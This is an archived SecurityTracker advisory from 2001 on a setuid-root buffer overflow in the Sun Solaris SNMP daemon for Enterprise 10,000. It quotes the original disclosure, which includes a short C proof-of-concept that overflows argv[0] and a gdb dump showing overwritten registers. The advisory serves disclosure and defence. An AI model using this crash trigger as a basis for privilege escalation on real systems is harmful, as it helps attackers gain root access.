SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   OS (UNIX)  >   SNMP Daemon Vendors:   Sun
Sun Solaris SNMP Network Management Daemon for Enterprise 10,000 May Give Root Access To Local Users
SecurityTracker Alert ID:  1001084
SecurityTracker URL:  http://securitytracker.com/id/1001084
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  Mar 15 2001
Original Entry Date:  Mar 14 2001
Impact:   Execution of arbitrary code via local system, Root access via local system


Description:   It was reported that the SNMP daemon that is part of the SUNWsspop package for the Sun Enterprise 10,000 System Service Processor contains a vulnerability that allows local users to execute arbitrary code on the server with root privileges, leading to root-level access to the server.

The /opt/SUNWssp/bin/snmpd command (SNMP proxy agent) reportedly contains a buffer overflow in which the application copies a user-supplied command line parameter (its own name (argv[0])) to an internal variable without checking the length of the parameter. Because snmpd is setuid root, a local user can cause commands to be executed with root privileges.

The original report illustrates the vulnerable code and the tecnical results of its buffer overflow.

Impact:   An authorized local user can cause commands to be executed with root privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.sun.com (Links to External Site)
Cause:   Boundary error
Underlying OS:  UNIX (Solaris - SunOS)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Vendor Confirms Bug (Re: Sun Solaris SNMP Network Management Daemon for Enterprise 10,000 May Give Root Access To Local Users)
The vendor confirms the bug.



 Source Message Contents

Subject:  Solaris 5.8 snmpd Vulnerability


Description

The /opt/SUNWssp/snmpd command (SNMP proxy agent)  is suid root
and contains a buffer overflow, the problem occurs when it copy his own
name (argv[0]) to an internal variable without checking out
its lenght and this causes the overflow.

Vulnerable Version

Sun Solaris 5.8

Technical Description

-----------------------------------------------------

#include <stdio.h>

void main(int argc,char **argv)
{
char *buf;
buf = (char *) malloc(atoi(argv[1])*sizeof(char));
memset(buf,0x41,atoi(argv[1])-1);
buf[atoi(argv[1])-1]=0;
execl("/opt/SUNWssp/bin/snmpd",buf,(char *)0);
}

-----------------------------------------------------

$ uname -a
SunOS tomy 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10

$ ./snmpd-demo 700
Segmentation Fault (core dumped)

$ gdb ./snmpd-demo --core=core

[..]

Program received signal SIGSEGV, Segmentation fault.
0xfee32b58 in strcpy () from /usr/lib/libc.so.1
(gdb) info registers
g0             0x0      0
g1             0x78000  491520
g2             0xff22579c       -14526564
g3             0xff162d78       -15323784
g4             0x0      0
g5             0x0      0
g6             0x0      0
g7             0x76f98  487320
o0             0x2c1    705
o1             0xffbed9b9       -4269639
o2             0x2c1    705
o3             0x41     65
o4             0xffbed180       -4271744
o5             0xff26a147       -14245561
sp             0xffbed658       -4270504
o7             0xfee83650       -18336176
l0             0x7efefeff       2130640639
l1             0x81010100       -2130640640
l2             0xff000000       -16777216
l3             0xff0000 16711680
l4             0xff00   65280
l5             0x0      0
l6             0x0      0
l7             0x0      0
i0             0x41414141       1094795585   ;;;;;
i1             0xffbed6fc       -4270340     ; pointer to argv[0]
i2             0x41414141       1094795585   ;;;;;
i3             0x41414141       1094795585   ;;;;;
i4             0x81010100       -2130640640
i5             0xff00   65280
fp             0xffbed698       -4270440
i7             0xff265474       -14265228
y              0x6      6
psr            0xfe001000       -33550336
wim            0x0      0
tbr            0x0      0
pc             0xfee32b58       -18666664
npc            0xfee32b5c       -18666660
fpsr           0x0      0
cpsr           0x0      0

(gdb) x/20x $i1
0xffbed6fc:  0x41414141   0x41414141   0x41414141   0x41414141
0xffbed70c:  0x41414141   0x41414141   0x41414141   0x41414141
0xffbed71c:  0x41414141   0x41414141   0x41414141   0x41414141
0xffbed72c:  0x41414141   0x41414141   0x41414141   0x41414141
0xffbed73c:  0x41414141   0x41414141   0x41414141   0x41414141


Pablo Sor
psor@afip.gov.ar


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC